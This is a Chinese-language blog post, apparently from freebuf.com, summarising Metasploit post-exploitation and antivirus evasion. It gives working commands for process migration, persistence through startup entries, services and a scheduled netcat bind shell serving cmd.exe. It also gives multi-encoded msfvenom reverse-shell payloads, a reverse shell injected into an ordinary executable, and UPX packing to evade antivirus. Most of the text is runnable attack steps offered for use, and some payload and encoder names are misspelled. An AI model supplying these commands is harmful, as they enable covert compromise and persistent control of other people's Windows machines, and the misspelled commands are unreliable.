hi,大家好,我是铁汉fhoenix。这里我为各位总结一下msf的免杀,维持以及进程迁移。
1.在目标运行M马,取得shell以后。可以先查询进程然后进行注入,这里我们用最简单的方法。直接输入run post/windows/manage/migrate 模块注入它会自动寻找合适的进程注入,并且自动迁移进程。
2.通过msf自带的persistence模块可以设置启动项来进行维持。下面我来解释一下,拿到shell以后输入run persistence -P windows/x64/meterper/reverse_tcp -X -i 5 -p 12345 -r 192.168.X.X 配置开机自启动,并且每次尝试连接的时间间隔为5秒。然后我们退出,输入exit,重新配置,开启监听后可以发现不要重新上传shell就可以立即拿到shell
3.通过metsvc模块可以在已经获取shell的设备上面开启一个服务来提供后M功能。自动安装后M run metsvc -A,他会自动创建一个端口为31337的服务,并且传输3个文件
4.通过scheduleme来创建计划任务,但是要system权限。在我们获取shell后输入getuid获取当前权限,运行getsystem把系统提升为system权限。这里我们又要用到大名鼎鼎的nc了,上传nc并创建计划任务,每分钟执行一次nc -Ldp 4444 -e cmd.exe,输入run scheduleme -m 1 -e ‘/nc.exe’ -o “-Ldp 4444 -e cmd.exe”。之后需要连接shell的时候直接输入nc -v 192.168.0.108 4444,用nc进行shell连接
5.通过autorunscript进行迁移进程。设定完lhost,lprot后输入set AutoRunScript post/windows/manage/migrate 然后run。我这里显示已经自动把进程迁移到了pid为1680的进
6.通过empire进行维持权限,他是一个基于powershell的渗透测试框架,具体我就不说了。github地址https:github.com/EmpireProject/Empire
下面是免S相关的内容:
通常msf裸奔肯定会被某绒查杀,所以使用msf多重编码是个好主意。上代码!
msfvenom -p windows/meterpreter/rever_tcp LHOST=192.168.0.100 LPORT=4444 -e x86/shiata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 –platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 –platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 –platform windows -i 10 -f exe -o a.exe
10次s编码,5次a编码,10次s编码,最后再来10次c编码。nice!
随便弄一个叫cc.exe的可执行文件。
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.100 LPORT=4444 -e x86/shikata_ga_nai -x cc.exe -i 5 -f exe -o cc2.exe
用shi对cc进行5次编码,当然你也可以进行多重编码。最后生成注入后的程序cc2。噢噢噢噢,对了你可以增加一个-k参数,配置攻击载荷在独立的线程内启动,这样不会对cc有所影响。
最后就是upx加壳
upx -5 cc2.exe -k OK,完美!
好的,希望各位看完以后会对自己有所帮助,我是黑客铁汉fhoenix,再见~
来源:freebuf.com 2021-07-29 17:03:01 by: ZGMFX42s
请登录后发表评论
注册